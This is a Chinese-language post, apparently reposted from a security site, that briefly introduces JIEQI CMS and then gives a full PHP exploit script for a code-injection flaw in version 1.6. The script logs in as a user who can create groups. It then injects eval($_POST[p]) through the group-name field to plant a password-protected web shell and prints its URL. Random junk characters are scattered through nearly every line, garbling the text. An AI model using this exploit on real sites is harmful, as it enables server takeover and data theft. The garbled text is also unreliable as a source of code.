杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
* h; t' V1 H! C( l+ a' Y4 C. I3 p, @/ S; |
+ G- G. b/ M8 o' u
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。: g; H& ?- i5 k+ ^' @
需要有一个能创建圈子的用户。
! E9 e3 @0 \" T4 ?$ j* Z' D% k % z& y* Z7 R9 R) H& I* W0 G
<?php
1 d# y+ B5 e; W$ n- B5 [
6 s& b. V g8 y- sprint_r('
1 S* z' |4 d" h3 }; I! o& V5 X3 X+---------------------------------------------------------------------------+
" y8 F7 ?, M8 g- M% gJieqi CMS V1.6 PHP Code Injection Exploit
/ k7 {2 `4 i- Nby flyh4t7 D9 x6 F8 u" Y" ]& h
mail: phpsec at hotmail dot com: a6 N' ?6 ^) [6 G
team: http://www.wolvez.org
* q6 G) ~6 L& E; {" l+---------------------------------------------------------------------------+6 X A' I4 Y$ a3 O/ v) I
'); /**' @3 X, C4 X1 h. `$ N
* works regardless of php.ini settings
% C/ a% Y( T' S& ?& i$ \6 Q*/ if ($argc < 5) { print_r('0 C6 `! {: r4 u6 i( q3 d6 o. V
+---------------------------------------------------------------------------+( h J% ?- r) ?. x% d, ^! g
Usage: php '.$argv[0].' host path username
- Y1 V: P1 O) \/ {$ N$ j& yhost: target server (ip/hostname). e: d% ~8 R& |8 I* \" a# J
path: path to jieqicms
z* w/ V( F/ d4 [" b1 Duasename: a username who can create group* i* H! y1 c7 Z$ ]# l# R& ~. }
Example:7 p( m2 Y/ F& f$ U; F# z( Q; r
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password" e+ r9 Z5 x) n; \3 j) o
+---------------------------------------------------------------------------+! C8 y0 x1 [ B
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
5 {2 D) W% O, [- W# YContent-Disposition: form-data; name="gname"# B* J! g! J6 [* `# X
; W5 z/ J* j- r
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
! i; L4 _6 J d+ l1 r5 M( m-----------------------------23281168279961
% _4 c+ n$ y( N! a4 V# U. F1 [Content-Disposition: form-data; name="gcatid"
) [1 O/ n0 {" w4 N* W 5 i+ D C3 a1 N) M7 U0 S: T$ J7 Z* \
1' e1 K, U: f3 p* A
-----------------------------23281168279961
. j3 R3 e) ~$ @* n7 @5 f5 _, AContent-Disposition: form-data; name="gaudit"! o& [; a" |8 O# v3 s0 n
. [% h0 \* t7 i2 L* d1% n3 [2 x: Y2 p! |, ~9 b
-----------------------------23281168279961* J/ W5 L. H; s6 s8 Q
Content-Disposition: form-data; name="gbrief"1 \# P- \. ^: e. o- l+ c n
6 ~" L/ `% }% g4 m* ]7 }% a
19 u& ?; E* F* j# ]
-----------------------------23281168279961--+ y# @: w) i7 F4 J
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
1 N1 e" A4 l& G8 f $ |- a1 N: m& T6 {2 {! {' |
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |